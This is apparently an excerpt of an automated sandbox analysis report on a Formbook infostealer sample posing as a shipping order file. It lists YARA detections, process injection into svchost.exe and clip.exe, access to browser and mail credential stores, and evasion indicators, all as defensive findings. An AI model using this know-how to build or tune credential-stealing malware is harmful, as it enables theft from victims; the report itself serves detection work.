            Source: MV Sunshine, ORDER.exe, 00000000.00000003.1682139228.00000000041AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MV Sunshine, ORDER.exe
            Source: MV Sunshine, ORDER.exe, 00000000.00000003.1683834674.0000000004003000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MV Sunshine, ORDER.exe
            Source: MV Sunshine, ORDER.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@15/11
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EA2D5 GetLastError,FormatMessageW,0_2_009EA2D5
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009D8713 AdjustTokenPrivileges,CloseHandle,0_2_009D8713
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009D8CC3
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009EB59E
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_009FF121
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009F86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_009F86D0
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00984FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00984FE9
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeFile created: C:\Users\user\AppData\Local\Temp\autD2A9.tmpJump to behavior
            Source: MV Sunshine, ORDER.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: clip.exe, 00000003.00000002.4132740210.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.2055719479.0000000002AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: MV Sunshine, ORDER.exeReversingLabs: Detection: 36%
            Source: MV Sunshine, ORDER.exeVirustotal: Detection: 30%
            Source: unknownProcess created: C:\Users\user\Desktop\MV Sunshine, ORDER.exe "C:\Users\user\Desktop\MV Sunshine, ORDER.exe"
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV Sunshine, ORDER.exe"
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV Sunshine, ORDER.exe"Jump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: MV Sunshine, ORDER.exeStatic file information: File size 1259008 > 1048576
            Source: MV Sunshine, ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: MV Sunshine, ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: MV Sunshine, ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: MV Sunshine, ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: MV Sunshine, ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: MV Sunshine, ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: MV Sunshine, ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QAjjirwAoAEExvw.exe, 00000002.00000000.1797929729.0000000000CEE000.00000002.00000001.01000000.00000004.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4132539420.0000000000CEE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: MV Sunshine, ORDER.exe, 00000000.00000003.1681365995.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine, ORDER.exe, 00000000.00000003.1681714096.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1776961435.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775137879.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.000000000496E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1873512801.0000000004468000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1875354185.000000000461D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: MV Sunshine, ORDER.exe, 00000000.00000003.1681365995.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine, ORDER.exe, 00000000.00000003.1681714096.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1776961435.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775137879.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000002.4134324267.000000000496E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1873512801.0000000004468000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1875354185.000000000461D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1873461084.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1841254218.000000000321A000.00000004.00000020.00020000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000002.4133106633.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4132740210.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.000000001685C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4132740210.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.000000001685C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1873461084.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1841254218.000000000321A000.00000004.00000020.00020000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000002.4133106633.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
            Source: MV Sunshine, ORDER.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: MV Sunshine, ORDER.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: MV Sunshine, ORDER.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: MV Sunshine, ORDER.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: MV Sunshine, ORDER.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009FC304 LoadLibraryA,GetProcAddress,0_2_009FC304
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E8719 push FFFFFF8Bh; iretd 0_2_009E871B
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009AE94F push edi; ret 0_2_009AE951
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009AEA68 push esi; ret 0_2_009AEA6A
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009A8B85 push ecx; ret 0_2_009A8B98
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009AEC43 push esi; ret 0_2_009AEC45
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009AED2C push edi; ret 0_2_009AED2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031C0 push eax; ret 1_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004161D3 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004162CC push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417356 push ebx; retf 1_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416338 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004083DA push es; ret 1_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040BBEC pushad ; iretd 1_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418577 push 2823B84Bh; retf 1_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417D38 push ecx; iretd 1_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411E39 push esp; ret 1_2_00411E41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD push ecx; mov dword ptr [esp], ecx1_2_039309B6
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D68202 push FFFFFFB8h; retf 2_2_02D68204
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D6D0E9 push ecx; iretd 2_2_02D6D0EA
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D62854 push 2823B84Bh; retf 2_2_02D62864
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D62015 push ecx; iretd 2_2_02D62016
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D68181 push edi; ret 2_2_02D68182
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D5C116 push esp; ret 2_2_02D5C11E
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D55EC9 pushad ; iretd 2_2_02D55ECB
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D526B7 push es; ret 2_2_02D526BB
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D61633 push ebx; retf 2_2_02D61636
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exeCode function: 2_2_02D68CBA push edx; ret 2_2_02D68CD6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_047D27FA pushad ; ret 3_2_047D27F9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_047D225F pushad ; ret 3_2_047D27F9
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00984A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00984A35
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00A055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00A055FD
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009A33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009A33C7
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeAPI/Special instruction interceptor: Address: 2223254
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 9720Jump to behavior
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99839
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeAPI coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 7688Thread sleep count: 253 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7688Thread sleep time: -506000s >= -30000sJump to behavior
